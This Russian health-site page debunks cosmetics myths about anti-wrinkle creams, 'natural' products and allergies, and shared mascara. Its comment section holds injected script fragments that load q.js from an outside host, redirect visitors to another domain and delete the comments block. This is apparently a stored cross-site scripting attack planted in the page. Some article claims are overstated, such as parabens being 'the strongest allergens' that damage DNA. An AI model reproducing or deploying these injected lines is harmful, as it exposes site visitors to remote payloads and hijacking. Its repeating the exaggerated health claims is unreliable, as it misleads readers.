Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мифы о косметике  >>  Мифы о косметике
 
Обратная связь
 

Мифы о косметике

Размер шрифта
21 августа 2013 00:00
  • google_analytics: false
  • Нравится

Женщины тратят целое состояние на дорогостоящую косметику для того, чтобы избавиться от морщин. Реклама твердит повсюду о новейших стопроцентно эффективных косметических средствах (кремах, сыворотках, гелях), которые помогут остановить старение! К сожалению, многие утверждения об избавлении кожи от старения – мифы.

Миф первый. Крем для лица избавляет от морщин

Что обещает реклама: Крема с коллагеном, гиалуроновой кислотой проникнут в кожу и восстановят ее молодость.

Наука: Молодость и красоту кожи обеспечивают коллагеновые волокна. С возрастом (из-за старости, УФ-лучей, курения) коллагеновые волокна становятся более плотными, но одновременно их эластичность снижается. Уменьшается количество коллагена, и эластина – главных белков, поддерживающих упругость кожи. В результате кожа становится сухой и дряблой, появляются морщины. Кроме того, уменьшается количество важных компонентов, обеспечивающих удержание воды в коже (гиалуроновая кислота, гликозоаминогликаны, хондроитинсульфаты и других), нарушается микроциркуляция крови в коже.

Как на самом деле: Компоненты крема, содержащие необходимые вещества (коллаген, эластин и гиалуроновая кислота), слишком большие и не могут проникнуть через узкие поры кожи. Через них может проникнуть только вода. Поэтому все что могут сделать крема – это увлажнить кожу и временно разгладить морщины.

Что делать: Правильный уход за кожей надо начать с молодости. Курение и УФ-лучи разрушают коллаген. Поэтому никакого курения и никаких соляриев. А если гуляете или заграете летом, то обязательно пользуйтесь солнцезащитным кремом с SPF 30-50. А чтобы кожа была всегда увлажненной – минимум 2 литра воды в день.

Миф второй. Натуральная косметика не вызывает аллергию

Что обещает реклама: Крема из натуральных ингредиентов не вызывают аллергических реакций!

Наука: Аллергия – это гиперчувствительность иммунной системы. Вызывает аллергию аллерген, то есть белок, который приводит к этой сверхчувствительности иммунной системы. Белки содержаться во всем! Поэтому и аллергическая может возникнуть в ответ на абсолютно все!

Как на самом деле: Многие «натуральные» косметические средства вообще содержат масла миндаля, фундука, эфирные масла (ароматизаторы), которые являются распространенными аллергенами.

В последнее время популярным компонентом косметических средств стали парабены. Это химические вещества, которые благодаря своим антибактериальным и противогрибковым свойствам широко используются в качестве консервантов в продуктах питания, медикаментах и косметических продуктах.

У парабенов 2 опасности: во-первых, при взаимодействии с ультрафиолетом они только ускоряют процессы старения кожи, вызывая повреждения ДНК. Во-вторых, парабены – сильнейшие аллергены и вызывают аллергические контактные дерматиты.

К слову о безопасности «натуральной» косметики, некоторые парабены были обнаружены в природе, в частности в растениях: метилпарабен присутствует в голубике в качестве противомикробного агента.

Так что натуральные компоненты в косметических средствах могут вызвать серьезную аллергическую реакцию и контактный дерматит с той же вероятностью, что и любые другие продукты.

Что делать: Нельзя слепо доверять природной косметике. Во многом она действительно лучше, чем ненатуральная. Но в вопросе аллергии все зависит только от вас. Знайте все симптомы аллергии, и на что у вас может быть такая реакция.

Миф третий. Пользоваться чужой тушью безопасно

Через кисточку туши может передаваться бактериальный конъюнктивит. Это инфекционное заболевание выражается в раздражении, покраснении и болезненности глаз. Причина – воспаление конъюнктивы – соединительной оболочки глаза, ответственной за выработку слизистой и жидкой части слезной жидкости, которая смачивает и смазывает глаз. Конъюнктива хорошо кровоснабжается, поэтому при ее воспалении очень хорошо видны расширенные сосуды (снаружи это выглядит как красные воспаленные глаза). Кроме того, воспаление может перейти и на кожу век, так как конъюнктива анатомически связана с кожей. Веки отекают, глаза краснеют, из глаз выделяется гной – признак инфекции и воспаления.

Вывод: пользоваться нужно только своей косметикой.

Также вы можете посмотреть сюжет передачи «Жить здорово» «Мифы о косметике. Как не стать жертвой красоты».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Какие надписи на косметике вам врут, а какие нет?   Как правильно спать?   Аллергия и мигрень связаны!   Хотите испортить кому-то настроение – заставьте посмотреть на солнце!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как снова хотеть секса
Косметика делает вас уставшей
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.